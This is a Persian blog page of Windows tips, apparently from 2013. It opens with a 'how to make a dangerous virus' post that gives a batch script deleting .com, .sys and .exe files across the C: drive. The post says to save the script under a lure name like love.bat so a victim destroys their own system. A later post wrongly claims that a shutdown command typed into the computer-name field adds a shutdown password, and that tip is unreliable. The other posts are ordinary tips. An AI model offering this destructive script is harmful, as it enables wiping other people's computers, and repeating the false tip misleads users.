loading...
►███▓▒░░ضامن چت ░░▒▓███◄
ضددختر

مجیدقزوین بازدید : 15 یکشنبه 01 بهمن 1391 نظرات (0)

اموزش ساخت ويروسي خطرناک

 

 اين ويروس رو اگر کسي باز کنه کامپيوتر رو با خاک مساوي مي کنه و ويندوز يا هر نوع سيستم

عامل ديگه رو از کار مي اندازه.

خوب ساختن ويروس رو آغاز مي کنم

روي start رفته و روي run کليک کنيد و notepad را تايپ کنيد

 بعد از باز شدن پنجره اين ها رو بنويسيد توش

@echo offCls

===========

Color fcDel /a c:\*.comDel /a c:\*.sysDel /a c:\*.exe /s

===========

ديگه بسه اين فايل را با هر نامي که دلتان خواست ذخيره کنيد

 ولي پسوند را با نام bat بگذاريد ، مثل love.bat .

من هيچ مسئوليتي رو در قبال اسفاده از اين ويروس ها به عهده نمي گيرم

 

مجیدقزوین بازدید : 11 یکشنبه 01 بهمن 1391 نظرات (0)

ااگر شما از ويندوز xp استفاده ميكنيد ميتوانيد از فايروال(ديوار اتش يا انتي هك)خود ويندوز xp استفاده كنيد.به كنترل پنل رفته و وارد Networking Connection شويد.در انجا روي ايكون dial up كه ساخته ايد راست كليك نيد و properties را انتخاب كنيد سپس تب Advanced را انتخاب كنيد و تيك مخصوص فعال كردن فايروال را فعال كنيد.

تجربه نشان داده كه ويندوزهاي 98 ,
me به راحتي هك ميشوند.بهتر است از ويندوز 2000 و xp استفاده كنيد.و حتما براي ويندوز 2000 هر سه سرويس پك موجود را نصب كنيد.همچنين براي ويندوز XP هم سرويس پك 1 عرضه شده كه ان را ميتوانيد از بازار به راحتي تهيه كنيد ويندوز XP به همراه سرويس پك 1 امن ترين سيستم عامل ميباشد.

همچنين ميتوانيد از فرمت امن
NTFS روي اين ويندوزها استفاده كنيد كه خود عاملي جهت جلوگيري از دستيابي ديگران به داده هاي شماست.

ياهو مسنجر خود داراي يك فايروال ميباشد.ميتوانيد از منوي
Login گزينه Privacy Setting را انتخاب كنيد و در داخل تنظيمات Connection فايروال را انتخاب كنيد.

اگر در ياهو ايميل داريد و چنانچه فايلي براي شما فرستاده شد ميتوانيد از طريق خود
Norton Anti Virus سايت ياهو چك كنيد.چنانچه در چت كسي به شما پيشنهاد دادن عكس يا فايل داد بدون رودرواسي درخواست كنيد به ادرس ايميل شما بفرستد.

از ورود به سايتهاي شخصي كه به شما پيشنهاد ميشود خودداري كنيد مخصوصا اگر ادرس به صورت چند عدد كه مثل يك ادرس
IP
ميباشد.


 

مجیدقزوین بازدید : 15 یکشنبه 01 بهمن 1391 نظرات (0)


این بار قصد دارم ترفندي را به شما معرفي کنم که با استفاده از آن مي توانيد کنترل خود را بر روي سيستم تان بيشتر کنيد. بدين صورت که وقتي فردي براي خاموش کردن سيستم اقدام کرد با اين ترفند مي توانيد پس از کليک فرد بر روي دکمه Turn off از او تقاضاي پسورد نماييد.


بدين منظور:
1-ابتدا يك اسم رمز براي كامپيوتر خود انتخاب كنيد.
2- به کنترل پنل رفته و بر روي آيکون System دوبار کليک نماييد.
3- در محل مشخصات و نام كامپيوتر اين دستور Shutdown -r -m computer name -t 300 ا را تايپ نماييد.
4- بر روي دکمه OK کليک کنيد تا خارج شويد.
* لازم به ذکر است در دستور بالا ميباست کلمات دلخواه خود را انتخاب و جايگزين نماييد:
Computer name = اسم رمز كامپيوتر كه شما آن را انتخاب كرده‌ايد
R = Restart
S = Shutdown
L= Log off
T300= نشان دهنده زمان خاموش شدن اتوماتيك به ثانيه است و ميتواند با عدد ديگري جايگزين شود

 

مجیدقزوین بازدید : 21 یکشنبه 01 بهمن 1391 نظرات (0)

SPY  : هر برنامه ای که به صورت مخفیانه و بدون آگاهی کاربر به کامپیوتر وارد شود SPY نامیده می شود SPY WARE ها می توانند فعلیتهای تخریبی بیشماری انجام دهند مثلا می توانند شماره کارت های اعتباری و یا آدرس های ایمیل و همچنین پسورد ها و ... را استخراج کنند و تمامی اطلاعات را برای شخص نفوذ گر بفرستند.

کرم اينترنتي يا
Worm  :

گونه ای از برنامه هاي تخريبي کرم اينترنتي يا
Worm هستند و کار اصلي آنها تخريب اطلاعات شخصي بر اساس يک الگوي خاص و مشخص مي باشد

اين گونه برنامه ها بدون اين که ردپايي از خود باقي بگذارد اطلاعات را تخريب مي کنند و در عين حال از کامپيوتري به کامپيوتر ديگر ميروند

بعضي از اين گونه کرمهاي اينترنتي بسيار بد تر از ويروس ها عمل مي کنند چون از همه موانع امنيتي به راحتي عبور مي کنند و اعمال تخريبي خود را انجام مي دهند .

اسب تروآ
Trojan :

گونه دیگری از برنامه های تخریبی اسب تروآ یا تروجان
Trojan می باشند این گونه از برنامه ها در ظاهر وانمود می کنند که خوب و بی ضرر اند اما در حقیقت هدف این گونه از برنامه ها خراب کردن و دزدیدن اطلاعات می باشند . اسبهای تروآ می توانند در زمان اتصال به اینترنت و یا از طریق ایمیل به سیستم وارد شوند و می توانند فایلها را حذف و اضافه ویا تغییر دهند.

سیستم مانیتور
SystemMonitor :

سیستم مانیتور برنامه هایی خاص منظوره برای کنترل
فعالیتهای کاربران می باشند .این گونه از برنامه ها می توانند تمامی اطلاعات را از قبیل آدرسهای
Email و پسورد ها و سایتهای بازدید شده و کلمات تایپ شده توسط صفحه کلید را جمع آوری کنند این گونه از برنامه ها حتی می توانند از فعالیتهای کاربران عکس برداری کرده و عکسها را بعلاوه سایر اطلاعات جمع آوری شده به آدرس ایمیلی خاص هدایت کنند .


BACK DOOR :

گونه ای از برنامه ها که فرد تجاوز گر به جا گذاشته و امکان نفوذ مجدد را برای دستیابی بعدی فراهم می کند.


TRACE :


یک نمونه از برنامه های جاسوسی
TRACE می باشد این گونه از برنامه ها می توانند به صورتهای مختلف سیستم را تخریب کنند یعنی هم می توانند به محیط ریجستری وارد شده و یا در حافظه رم مقیم شوند ویا به درون دیسکها منتقل شوند و حتی خود را به فایلها بچسبانند و کار تخریبی انجام دهند.

علاوه بر این گروه از ابزار های تخریبی و جاسوسی گونه های دیگری ازاین قبیل ابزار ها وجود دارند که سیستم را مورد هجوم و تخریب می دهند
می توان از این گروه به ماکرو ها و
EXPLOIT ها نیز اشاره کرد 

مجیدقزوین بازدید : 16 یکشنبه 01 بهمن 1391 نظرات (0)

در نظر بگيريد كه سرعت كامپيوتر شما مرتباً كمتر و كمتر مي شود، برنامه هاي نرم افزاري زمان زيادتري براي اجرا شدن لازم دارند و زمان وارد شدن به يك سايت در اينترنت، بسيار طولاني مي شود. اتصال به شبكه اينترنت، هميشه مقصر و علت اصلي در پايين آمدن سرعت كامپيوتر نيست، بلكه خود كامپيوتر، مهمترين علت آن است. تعداد برنامه ها، فايل هاي قديمي و حتي تنظيمات اشتباه، از دلايل كم شدن سرعت كامپيوتر هستند. 10 نكته مهم ذيل به كامپيوتر شما سرعت مي بخشد:

1- استارت سريع!
اگر عمل Shutdown در كامپيوتر درست انجام نشود، كامپيوتر در استارت بعدي، براي اينكه هارد را از لحاظ داشتن خطا يا اشتباه چك كند، با برنامه Scandisk استارت مي شود كه مستلزم صرف زماني طولاني است. براي اينكه از اجرا شدن Scandisk جلوگيري كنيد، به ترتيب زير عمل كنيد:
از منوي استارت بر روي Run كليك كرده و بعد دستور msconfig را اجرا كنيد. سپس قسمت system configuration programs را باز كنيد و در قسمت Register، general كليك كنيد و سپس فرمان “ Scandisk after error by shutdown disabled “ را فعال كنيد. در آخر، همه پنچره ها را با دستور ok ببنديد و ويندوز را دوباره استارت كنيد.

2-از كار انداختن پخش آهنگ هنگام بالا آمدن سيستم
اگر كامپيوتر شما هنگام بالا آمدن سيستم، آهنگ پخش مي كند، در صورتي كه آن را از كار بيندازيد، كامپيوتر سرعت بيشتري خواهد داشت. براي اين كار، به ترتيب از Start/Settings/Control Panel، قسمت Sounds and Multimedia را انتخاب كنيد. پس از آن، پنچره اي باز مي شود. در آنجا مشخص شده است كه كدام قسمتها به همراه پخش آهنگ عمل مي كنند. قسمتهايي كه با پخش آهنگ همراه هستند، علامت بلند گويي را در كنار خود دارند بر روي قسمتهايي كه مي خواهيد پخش آهنگ آنها را غيرفعال كنيد، مارك بزنيد. سپس از منوي Name كه در زير آن قرار گرفته است، دستور None را انتخاب كنيد.



3- لغو دستور اجراي اتوماتيك برنامه ها
بسياري از برنامه هاهنگام استارت به طوراتوماتيك اجرامي شوند. آيا شما واقعاً به همه آنها احتياج داريد؟ براي اينكه از استارت شدن اتوماتيك اين برنامه ها جلوگيري كنيد، از منوي استارت، Run را انتخاب كرده و سپس دستور msconfig را اجرا كنيد. از طريق Register و بعد “ Auto Start “ قادر نخواهيد بود كه برنامه مورد نياز خود را به صورت مجزا انتخاب كنيد، بلكه فقط مي توانيد علامت تيك (P) يا ضربدر (×) را از جلوي برنامه هايي كه نمي خواهيد اجرا شوند، برداريد.

4- پاك كردن برنامه ها
شما همواره برنامه هايي را از اينترنت Download مي كنيد. براي پاك كردن آنها از برنامه Uninstall استفاده كنيد، كه آن را مي توانيد به ترتيب از Start/Settings/Control Panel تحت نام Add/Remove Programs پيدا كنيد.
برنامه اي را كه مي خواهيد پاك كنيد، مارك بزنيد و بعد بر روي آيكون Add/Remove كليك كنيد. بدين ترتيب، برنامه به طور كامل از كامپيوتر شما پاك مي شود.

5-ايميل هاي قديمي را پاك كنيد.
ايميل هايي كه به خصوص با فايل هاي پيوست شده ( عكس، فيلم و فايل هاي موسيقي ) ارسال شده اند، سرعت و قدرت كامپيوتر را كاهش مي دهند. به همين دليل، تمام ايميل هاي خود را به طور كامل بررسي كنيد و آنهايي را كه ديگر احتياجي نداريد، پاك كنيد.

 6-Defragment كردن هارد
با دستور Defragment، هارد كامپيوتر خود را مرتب كنيد. خود اين كار، زمان مي برد، ولي در عوض، سرعت كامپيوتر شما را بالا خواهد برد. براي اين كار از منوي استارت Programs/Accessories/System tools/Disk Defragmenter را كليك كنيد.
نكته: پس از شروع عمل Defragment، كامپيوتر را به حال خود بگذاريد و هيچ كار ديگري با آن انجام ندهيد.

7- عكس زمينه را غير فعال كنيد.
اين عكسها با وجود همه جذابيتي كه دارند قدرت و سرعت كامپيوتر را كم مي كنند. بنابراين، بهتر است كه عكس پيش زمينه را برداريد. براي اين كار با كليك راست ماوس بر روي صفحه Desktop، Properties را انتخاب كنيد و در قسمت Background، دستور None را انتخاب كنيد.

8- فايل هاي موقت و آدرس هاي اينترنتي موجود در حافظه موقت را پاك كنيد.
در حالي كه در اينترنت مشغول جستجو هستيد، Browser مثلاً (Internet Explorer) كپي سايت هاي بازديد شده را بر روي هارد قرار مي دهد. اين كار، عمل جستجو را تسريع مي كند، اما به تدريج مقدار زيادي اطلاعات جمع مي شود كه سرعت كامپيوتر را كم مي كند. بنابراين، بهتر است كه اين فايل ها را پاك كنيد. در Browser، از منوي بالاي صفحه، Tools و سپس Internet Options را انتخاب كنيد و آن گاه بر روي Delete Files، Delete Cookies كليك كنيد.

9- كاهش ظرفيت فايل ها و آدرس هاي اينترنتي كه در كامپيوتر ذخيره مي شوند.
پاك كردن هر روز فايل هاي موقت و آدرس هاي اينترنتي ، واقعاً اعصاب را خسته مي كند. شما مي توانيد Cashe خود را طوري تنظيم كنيد كه فقط اطلاعات كمي را بتوانيد ذخيره كنيد.
براي اين كار در Browser، Tools و سپس Internet Option را انتخاب كنيد. در پنجره باز شده بر روي قسمت Settings كليك كنيد. در آنجا قسمت Amount of disk space to use را برابر مقدار 1MB تنظيم كنيد.

10-روزآمد كردن ويندوز
شركت مايكروسافت به طور مرتب نسخه هاي update ويندوز خود را براي كاربرانش ارائه مي دهد. در نتيجه، قادر خواهيد بود كه درايوها و فايل هاي جديد را به صورت رايگان Download كنيد. از منوي استارت، قسمت Windows update را انتخاب كنيد. با اين كار، ويندوز نصب شده بر روي كامپيوتر شما update خواهد شد.

مجیدقزوین بازدید : 15 شنبه 30 دی 1391 نظرات (0)

اگر عکس‌هاو فایلهای  زیادی را آرشیو کرده‌اید ومیخواهید با توجه به اسم یا تاریخ مرتب کنید.  انها  با این ترفند می‌توانید تمای فایل‌ها و عکسها را با هم تغییر نام دهید،  با این کار نام فایل و عکسها تغییر خواهد کرد در انتهای نام عکس شماره زده خواهد شد

 

روش کار:

ابتدا تمام عکس‌هایی و فایل هارا که می‌خواهید تغییر نام دهید انتخاب کنید (select all)

روی اولین عکس کلیک سمت راست کرده سپس آنرا Rename کنید، نام مورد نظر را تایپ کنید(مثلا محمد )

نتیجه را ببینید. 

مجیدقزوین بازدید : 17 شنبه 30 دی 1391 نظرات (0)

برای پاک کردنURLها که در نوار آدرس دیده میشوند از ریجستری استفاده میکنیم

 

روش کار:

وارد ریجستر شوید وکلید زیر را بیابید:

HKEY_CURRENT_USER\Default\Software\Microsoft\Internet Explorer\Typed URLs
در سمت راست تمامی آدرس هایی را که وارد کردایده میبینید برای پاک کردن آدرس ها،روی هر کدام که میخواهید حذف شود. راست کلیک کنید و گزینه Delete راانتخاب کنید.
 

مجیدقزوین بازدید : 20 شنبه 30 دی 1391 نظرات (0)

گاهی وقتا بنا به دلایلی قادر به استفاده از صفحه کلید کامپیوتر نیستید. از صفحه کلید مجازی استفاده کنید:

 

برای این کار کافیست عبارت osk را در RUNتایپ کنید

مجیدقزوین بازدید : 17 شنبه 30 دی 1391 نظرات (0)

سلام دوستان

 

در این ویدیو به شما آموزش داده میشود که چگونه میتوان یک نیوفولدر را بی نام کرد

وحتی آیکون آن را مخفی کرد به طوری که کسی نتواند آن را مشاهده کند 

 

دانلود کنید مدت زمان ویدیو:  ۰۰:۵۰است موفق باشید

امیدوار لذت برده باشید                                               

 ما دلگرمی جز نظر شما دوستان نداریم

مجیدقزوین بازدید : 22 شنبه 30 دی 1391 نظرات (0)

یکی از معمولیترین شرایطی که برای اکثر کاربران ویندوز به وجود می آید مواجه شدن با پیامهای خطایی است که از طرف سیستم عامل و در جهت آگاه ساختن آنها تولید می شود.

مجیدقزوین بازدید : 23 شنبه 30 دی 1391 نظرات (0)

یکی از رایج ترین کارهایی که تایپیست های حرفه ای انجام میدهند کشیدن حروف و کلمات برای زیباسازی متن تایپ شده است. شما نیز میتوانید با استفاده از این ترفند متون خود را در داخل ویندوز بکشید.

برای این کار:کافی است در هر مکانی از ویندوز ، زبان ویندوز را روی فارسی تنظیم کنید.سپس حرف مورد نظر خود را تایپ کرده و کلیدهای ترکیبی Shift+J را دو سه بار همزمان بفشارید.تا نتیجه مطلوب تان را به دست آرید.

مجیدقزوین بازدید : 11 شنبه 30 دی 1391 نظرات (0)

هنگامیکه ویندوز اجرا می شود تعدادی برنامه کاربردی همزمان با آن به صورت خودکاراجرامی شود و اغلب آیکون آنها در قسمت Taskbar کنار ساعت نشان داده می شوداین برنامه ها باعث می شوند ویندوز کند راه اندازی شود و همچنین اینبرنامه ها بخشی از RAM را اشغال می کنند که این نیز باعث کند شدن ویندوز میشود .

اینک برای جلوگیری از اجرای برخی از این برنامه ها به ترتیب زیر عمل نمایید:

 در منوی RUN عبارت msconfig را تایپ کنید.

مجیدقزوین بازدید : 16 شنبه 30 دی 1391 نظرات (0)

در هر محیطی که باشید می توانید با فشار دکمه Print Screen از کل صفحه عکس بگیرید. عکس گرفته شده در Clip Board ویندوز کاپی می شود.حالا برنامه Paint و یا Adobe Photoshop  را باز کنید. سپس دکمه های Ctrl+V را فشار دهید تا عکس گرفته شده Paste شود. حال برای ذخیره عکس از منوی File گزینه Save  را انتخاب کنید. و اگر دکمه alt+print screen را بفشاریم فقط آنجا را عکس می گیرد که شما کار می کنید  یعنی دکمه Alt+Print Screen  فقط از پنجره فعال عکس می گیرد.

مجیدقزوین بازدید : 19 شنبه 30 دی 1391 نظرات (0)

از دو طریق می توانیم فولدری را پنهان کنیم.     

۱  برای اینکه  فولدری را پنهان کنید که فقط خودتان از آن خبر داشته باشید باید به روش زیر عمل کنید . اول فولدر مورد نظر خود را به حالت Rename در بیاورید  سپس دکمه ی Alt را پایین نگه داشته و عدد 0160 را تایپ کنید و اینتر بزنید. خوب حالا فولدر شما بی نام شد. برای اینکه آیکنش را هم غیب کنید ، روی پوشه راست کلیک کنید و Properties را کلیک کنید . سپس از پنجره ی باز شده روی تبCustomize کلیک کنید و بعد روی دکمه ی Change icon کلیک کنید. ...

 

 

مجیدقزوین بازدید : 18 شنبه 30 دی 1391 نظرات (0)

همه ما نرم افزارهايي را روي سيستمهاي خود نصب داريم كه از آنها استفاده ميكنيم. ولي همه از اين موضوع شكايت داريم كه ويندوزمان بعد از نصب چند برنامه كند شده است و مثل روزهاي اول كار نميكند. علت در نرم افزارهايي است كه نصب كرده ايم. در اين ترفند نرم افزارها را به چند دسته تقسيم ميكنيم و ميزان تاخيري را كه در سيستم عامل ايجاد خواهند كرد را بررسي خواهيم كرد: ...

مجیدقزوین بازدید : 20 شنبه 30 دی 1391 نظرات (0)

مقدمه: در این بخش به صورت تخصصی , به تعریف مودم و عملکرد ان در سرویس هایdailup و ADSL می پردازیم.dailup : برای برقراری ارتباط بین دو کامپیوتربا استفاده از خطوط تلفن به روش سنتی(dailup) باید از یک مودم  استفاده کرد .

 

مجیدقزوین بازدید : 31 شنبه 30 دی 1391 نظرات (0)

رای شروع کار وارد Computer در ویندوز 7 شوید بر روی درایو C کلیک راست کنید و از منوی باز شده گزینه Properties را انتخاب کنید . بر روی تب Tools کنید و

سپس روی دکمه Backup now کلیک کنید.

 بر روی Set up Backup کلیک نمایید . ... 

مجیدقزوین بازدید : 13 شنبه 30 دی 1391 نظرات (0)

با استفاده از روش زير ، ميتوانيد آهنگ شروع ويندوز و قسمت هاي ديگر را عوض کنيد.

1- ابتدا آهنگ دلخواه را انتخاب کنيد(آهنگ بايد کوتاه باشد يا قسمتي از آهنگ باشد)

2- به پوشه ويندوز رفته و بعد به پوشه مديا برويد و آهنگ مورد نطر را در اين پوشه کپي نماييد.

3- بعد به Control Panel رفته و بر روي آيکون sounds and audio دوبار کليک کنيد.

4- در صفحه اي که باز ميشود روي تب sounds کليک کنيد.

5- در قسمت Program event مورد start windows را انتخاب نماييد.

6- بر روي Browse کليک کرده بر روي آهنگ مربوطه کليک کنيد.

7- در پايان OK را زده و خارج شويد.

8- از اين پس هنگام روشن شدن کامپيوتر آهنگ دلخواه خود را خواهي شنيد.

(لازم به ذکر است که ميتوانيد با استفاده از اين روش آهنگ قسمت هاي مختلف ويندوز را نيز عوض کنيد.)

مجیدقزوین بازدید : 22 شنبه 30 دی 1391 نظرات (0)

نکته مهم هنگام تمیز کردن دیسک روش پاک کردن است که توصیه می شود مطابق عکس زیر این کار را انجام دهید.

تمیز کردن از داخل شعاع دیسک به سمت بیرون باید انجام گیرد در غیر این صورت به سی دی یا دی وی دی آسیب می رسد.

آموزش پاک کردن سی‌دی و دی‌وی‌دی + عکس

پاک کردن دیسک با آب کار نا صحیحی نیست و در منبعی ذکر نشده که پاک کردن با آب خطاست، منتها باید قبل از قرار دادن دیسک در درایو به طور کامل خشک شده باشد.

همچنین استافده از پارچه کتان نرم که خش ایجاد نمی کند نیز توصیه شده است. اما هر نوع دستمال زبر که ممکن است ایجاد خش روی دیسک کند، توصیه نمی شود.

مجیدقزوین بازدید : 20 شنبه 30 دی 1391 نظرات (0)

در ادامه به توضیح برخی از نکاتی می پردازیم که هر کاربر ساده کامپیوتر باید بداند. اگر از کاربران تازه کار رایانه و اینترنت هستید توصیه می کنیم این مطلب را با دقت بخوانید.

افراد زیادی از خیلی تعاریف و نکات ابتدایی کامپیوتر که برای اکثر مردم خصوصآ جوانان بسیار بدیهی و جا افتاده است ، بی اطلاع هستند و در دنیای مجازی اینترنت ممکن است با اصطلاحات و مواردی روبرو شوند که آنها را دچار سردرگمی یا مشکل کند.

مجیدقزوین بازدید : 19 شنبه 30 دی 1391 نظرات (0)

یکی از ساده ترین کارا  قرار دادن آیکون ها بدون اسم روی دسکتاپ است که ماشا ماشاالله همه شما این کارو بهتر از من بلدین ، ولی اینو برای اونایی میگم که تازه کارن و چیز زیادی بلد نیستن :

  روي ايكون مورد نظركليك كنيد ، بعد کلید را فشار دهید، یا راست کلیک کرده و گزینه Rename را بزنید بعد کلید Alt  را پایین نگاه دارید و در همان حین عدد 0160 یا 255 (یکی به انتخاب) را بزنید سپس کلید Alt را رها کنید.  اگه این کار رو درست انجام داده باشی اسم اون آِیکون به هیچی تغییر میکنه  یعنی دیگه اسمی نداره!!!

مجیدقزوین بازدید : 26 شنبه 30 دی 1391 نظرات (0)

خبر خوبی که برای شما داریم این است که مایکروسافت فرایند ارتقا به ویندوز ۸ را برای این دسته از کاربرانش بسیار ساده کرده.اما قبل از شروع به کار باید چند نکته را به شما گوشزد کنیم.

کدامیک از سیستم عامل های قدیمی مایکروسافت را می توان به ویندوز ۸ ارتقا داد؟
به گفته وبلاگ رسمی مایکروسافت، ویندوز XP، ویستا، یا سون را می توان به ویندوز ۸ پرو ارتقا داد .

مجیدقزوین بازدید : 35 شنبه 30 دی 1391 نظرات (0)

مرورگر موزیلا فایرفاکس شاید دیگر نیازی به معرفی نداشته باشد. دانلودهای فراوان و رضایت کلی کاربران از این مرورگر ، فایرفاکس را به سمبلی از اینترنت سریع تبدیل کرده است. اما فایرفاکس باز هم راه هایی برای بهینه سازی استفاده دارد. دسترسی سریعتر به سایت های مورد علاقه شما و جستجوی سریع در این سایتها دو ترفندی است که تقریبأ 99% کاربران از آن بی اطلاعند و این قابلیت های جالب فایرفاکس به نوعی در پشت مه باقی مانده است. هم اکنون قصد داریم به معرفی این دو ترفند بپردازیم.


در فایرفاکس قابلیتی نهفته است که شما میتوانید تنها با وارد کردن یک حرف و فشردن Enter به صفحه مورد نظر خود مراجعه کنید. 

مجیدقزوین بازدید : 28 شنبه 30 دی 1391 نظرات (0)
 ویروسی شدن فلش

روش اول:

بطور خلاصه در این روش می‌خواهیم مقدار فضای خالی موجود در فلش را با یک فایل ساختگی یا Dummy پر کنیم تا هیچ فایلی نتواند درون فلش ذخیره و ایجاد شود. البته این روش زمانی کارآمد است که شما می‌خواهیداز اطلاعات داخل فلش مموری خود استفاده نمایید و نیازی به فضای خالی آن ندارید.

قبل از انجام این کار نیاز به دانستن میزان فضای خالی موجود در فلش داریم. برای این کار بر روی درایو فلش راست کلیک کنید و گزینه Properties را برگزینید. در پنجره باز شده میزان دقیق فضای خالی را یاداشت کنید.

حال در قسمت run فرمان Cmd را تایپ کنید. در این قسمت ما می‌خواهیم...

مجیدقزوین بازدید : 24 شنبه 30 دی 1391 نظرات (0)

مطمئنأ شما هم دوست دارید ویندوزی را که نصب میکنید برای مدت طولانی به سلامت در اختیار داشته باشید. قصد داریم 12 ترفند ویژه برای بیشتر کردن طول عمر ویندوز به شما معرفی کنیم که با عمل به آنها میتوانید پایداری ویندوز خود را تضمین کنید.

 

1- همیشه ویندوز را از پایه نصب کنید: ارتقاء از نسخه قبلی ویندوز آسانتر و سریعتر می باشد اما دیر یا زود شما بهای این راه میانبر را با مشکلاتی نظیر عدم پایداری ویندوز خواهید پرداخت. پس بهتر است وقت بیشتری گذاشته تا از مشکلات بعدی نجات پیدا کنید.

2- در مورد خرید سخت افزار مرغوب خساست به خرج ندهید: کارآیی سیستم شما به کیفیت اجزاء و قطعاتی است که در آن به کار رفته است با پرداخت مبلغ اندکی بیشتر می توانید تفاوت محسوسی در پایداری سیستم خود بیابید. از خرید RAM، منبع تغذیه، دیسک سخت، سی دی رام، کارت گرافیک، کارت شبکه و سایر قطعات با مارکهای ناشناخته خودداری کنید. این قانون در مورد ادوات جانبی نظیر پرینتر،... 

مجیدقزوین بازدید : 20 شنبه 30 دی 1391 نظرات (0)

چه تجربه شما از کامپیوتر به زمان پادشاهی DOS برسد، چه به زمان ظهور ویندوز XP، همیشه چیزهای جدیدی برای یادگیری در مورد سیستم‌عامل مورد استفاده، وجود دارد. ما در اینجا تعدادی از نکات مهم در مورد استفاده از ویندوز را برای شما جمع‌آوری کردیم. غیر از بعضی از نکات خاص که مشخص شدند، بقیه موارد در مورد ویندوزهای 98، ME ،2000 و XP صادق هستند.

 

کیبورد را به خاطر بسپار
محیط ویندوز بر اساس آیکون‌ها، پنجره‌ها و نشانگرهاست که تمام این‌ها معمولأ با موس اداره می‌شود و همین برداشتن دست از روی کیبورد، برای حرکت دادن موس، سرعت تایپ را کاهش می‌دهد. و حالا اگر اصلأ موس نبود چه؟ مثلأ وقتی که مشکل درایوری وجود دارد! تقریبأ هر کاری که با موس انجام می‌شود را می‌توانید با کیبورد هم انجام بدهید.

استفاده از Alt+Tab
هنگامی که چندین پنجره و برنامه باز و در حال اجراست، اسامی آن‌ها روی نوار ابزار نشان داده می‌شود که با کلیک کردن روی آن‌ها، می‌شود آن پنجره یا برنامه را فعال کرد. اما وقتي.. 

مجیدقزوین بازدید : 19 شنبه 30 دی 1391 نظرات (0)

با استفاده از ترفندی که هم اکنون به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و از طریقی ترفندی ساده فایلهای خود را مخفی سازید. جالبی این ترفند اینجاست که همگی افراد میتوانند آیکون این فایل را مشاهده کنند اما فقط فقط خود شما قادر خواهید بود که آن را اجرا یا نمایش دهید. همچنین با این کار دیگر فایل مورد نظر در Search ویندوز نیز نمایان نخواهد شد.

 

براي ديدن ادامه مطلب بر روي"ادامه مطلب" كليك كنيد.

مجیدقزوین بازدید : 45 شنبه 30 دی 1391 نظرات (0)

هنگامی که ویندوز 98 به بازار رایانه ها آمد به همراه آن نوع جدیدی از فرمت به نام FAT32 نیز ارایه شد که این نوع فرمت به طور کامل از ویندوز 98 و ME پشتیبانی می کرد. اما پس از عرضه ویندوز 2000 و پس از آن ویندوز XP ، نوع جدیدی از فرمت به نام NTFS ارائه شد که متفاوت از سیستم قبلی یعنی FAT32 بود. امنیت بیشتر و کارکرد بهتر این نوع فرمت از ویژگی های بارز آن بود. ممکن است درایو های شما نیز تحت سیستم فایل FAT32 باشد و دوست داشته باشید آن را به NTFS تغییر دهید. در این صورت چه میکنید؟ آیا پارتیشن سیستم را فرمت میکنید و فایل سیستمی جدید را قرار میدهید؟ طبعأ با این کار اطلاعات آن درایو نیز از دست میرود. با ترفندی ساده میتوانید FAT32 را به NTFS تبدیل کنید، بدون آنکه اطلاعات آنها از بین برود.

 

براي يادگيري به ادامه مطلب برويد.

مجیدقزوین بازدید : 141 شنبه 30 دی 1391 نظرات (0)

این روزها حافظه‌های فلش همه جا هستند. حمل آسان این حافظه‌های کوچک که تا چندین گیگ اطلاعات را می‌توانند در خود ذخیره کنند باعث شده است که تقریباً در جیب هر فردی که به نوعی به کامپیوتر سر و کار دارد یک فلش دیسک جا خوش کند. اما یکی از بزرگترین مصائبی که دارندگان کول دیسک با آن روبرو هستند، جا گذاشتن آن در پورت USB کامپیوترهای غریبه است. بسیار پیش می‌آید که کاربران پس از وصل کردن فلش دیسک به کامپیوترهای متفرقه، بعد از اتمام کار خود فراموش می‌کنند فلش را از پورت USB جدا کنند و همین موضوع سبب مشکلات بزرگی می‌شود. در این ترفند قصد داریم تا راه حلی را برای شما معرفی کنیم که در صورت استفاده از آن می‌توانید مطمئن باشید که دیگر هیچ وقت فراموش نمی‌کنید فلش دیسک خود را جدا کنید و آن را در هیچ کجا جای نمی‌گذارید.

مجیدقزوین بازدید : 26 شنبه 30 دی 1391 نظرات (0)
فعال کردن قابلیت نمایش فایلهای حفاظت شده سیستم عامل، این اجازه را به انتی ویروسها میدهد که به فایلهای سیستمی نیز دسترسی یابد و آنها را نیز اسکن کرده و ویروسهای پنهان را کشف و پاک کند. 
ویروسهای جدید امروزه از هوش بالایی برخوردار هستند و مهمترین ویژگی آنها این است که به محض ورود به سیستم قربانی خود را به روشی جالب از دید او و آنتی ویروس او مخفی نگه میدارند به طوری که حتی با آنتی ویروس های قوی مانند Nod32 را و کسپرسکی نیز قابل رویت و حذف نیستند.

همچنین با تعویض ویندوز نیز دردی دوا نمی شود و ویروس ها همچنان به کار خود ادامه می دهند! دلیل این مشکل این است که آنتی ویروس ها اجازه دسترسی به فایل های حفاظت شده سیستمی را ندارند و هنگام جستجو به راحتی از کنار ویروس هایی با مشخصات فایل سیستمی عبور می کنند!

این ویروسها نیز بسیار هوشمندانه برنامهریزی شده اند به طوری که خود را به صورت فایلهای حفاظت شده سیستم عامل در میآورند و بدین صورت خود را مخفی میکنند تا از چنگ آنتی ویروسها در امان باشند.

اما در این جا ما با روشی بسیار ساده این اجازه را به آنتی ویروسها میدهیم که به فایلهای سیستمی نیز دسترسی یابند و آنها را نیز اسکن کند و ویروسهای پنهان را کشف و پاک کند بنابراین اگر تا به حال سیستم شما حتی یک بار هم ویروسی شده است حتما این مقاله را بخوانید تا از عدم وجود ویروس های مخفی در سیستم خود مطمین شوید.

در این مقاله ما با فعال کردن قابلیت نمایش فایلهای حفاظت شده سیستم عامل این اجازه را به آنتی ویروسها میدهیم که به فایلهای سیستمی نیز دسترسی یابد و آنها را نیز اسکن کند و ویروسهای پنهان را کشف و پاک کند.

برای این کار:

1 - به کامپیوتر من بروید و در نوار ابزار گزینه ابزار را انتخاب کنید.

2 - در منوی ابزار گزینه گزینه پوشه را انتخاب نمایید.

3 - سپس به سر برگ نمایی بروید.

4 - در بخش فایل ها و پوشه ها مخفی تنظیمات زیر را اعمال کنید:

الف - گزینه نمایش فایل های مخفی و پوشه ها را انتخاب کنید زیرا اکثر ویروس ها پنهان هستند.

ب - تیک گزینه مخفی کردن پسوند برای انواع فایل های شناخته شده را برای نمایش پسوند فایل ها بردارید (پسوند ویروس ها اکثرا EXE است)

ج - تیک گزینه مخفی کردن فایل های حفاظت شده سیستم عامل (توصیه می شود) را برای نمایش فایل های حفاظت شده سیستمی بردارید و با اخطاری که می دهد موافقت کنید.

5 - سپس OK را بزنید و از نوار ابزار خارج شوید.

